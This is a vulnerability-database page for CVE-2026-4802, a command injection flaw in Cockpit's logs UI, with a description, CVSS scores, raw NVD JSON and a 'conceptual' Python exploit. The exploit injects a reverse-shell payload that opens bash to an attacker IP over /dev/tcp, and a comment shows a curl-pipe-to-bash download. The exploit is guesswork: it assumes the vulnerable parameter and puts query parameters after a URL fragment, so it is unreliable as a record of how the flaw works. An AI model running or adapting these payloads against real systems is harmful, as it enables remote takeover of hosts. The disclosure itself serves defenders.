Security Vulnerability Report
中文
CVE-2026-4802 CVSS 8.0 HIGH

CVE-2026-4802

Published: 2026-05-11 14:16:32
Last Modified: 2026-05-12 14:20:57
Source: [email protected]

Description

A flaw was found in Cockpit. This vulnerability allows a remote attacker to achieve arbitrary command execution on the host by exploiting unsanitized user-controlled parameters within crafted links in the system logs user interface (UI). An attacker can inject shell metacharacters and command substitutions into these parameters, leading to the execution of arbitrary shell commands on the affected system. This could result in a complete system compromise.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cockpit < commit e204cd130 (具体版本请参考官方修复公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-4802 # This script demonstrates how an attacker might inject a command. # The vulnerability resides in the logs UI parameter handling. import requests target_url = "https://<target-cockpit-host>:9090" # Attacker controlled IP for reverse shell attacker_ip = "192.168.1.100" attacker_port = "4444" # Payload to inject shell metacharacters # Example: ; /bin/bash -c 'curl http://attacker_ip/shell | bash' payload = f"; /bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'" # Vulnerable endpoint in Logs UI (Conceptual) vulnerable_endpoint = "/cockpit/@localhost/system/logs#" # Session cookie or authentication token would be required (PR:L) cookies = { "cockpit": "<session_token>" } params = { "query": payload, # Assuming the vulnerable parameter is 'query' or similar in logsJournal.jsx "options": "all" } try: response = requests.get(target_url + vulnerable_endpoint, params=params, cookies=cookies, verify=False) if response.status_code == 200: print("Payload sent successfully. Check for reverse shell.") else: print(f"Failed to send payload. Status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4802", "sourceIdentifier": "[email protected]", "published": "2026-05-11T14:16:31.550", "lastModified": "2026-05-12T14:20:56.547", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Cockpit. This vulnerability allows a remote attacker to achieve arbitrary command execution on the host by exploiting unsanitized user-controlled parameters within crafted links in the system logs user interface (UI). An attacker can inject shell metacharacters and command substitutions into these parameters, leading to the execution of arbitrary shell commands on the affected system. This could result in a complete system compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-4802", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451155", "source": "[email protected]"}, {"url": "https://github.com/cockpit-project/cockpit/blob/e204cd130/pkg/systemd/logsJournal.jsx#L206-L210", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.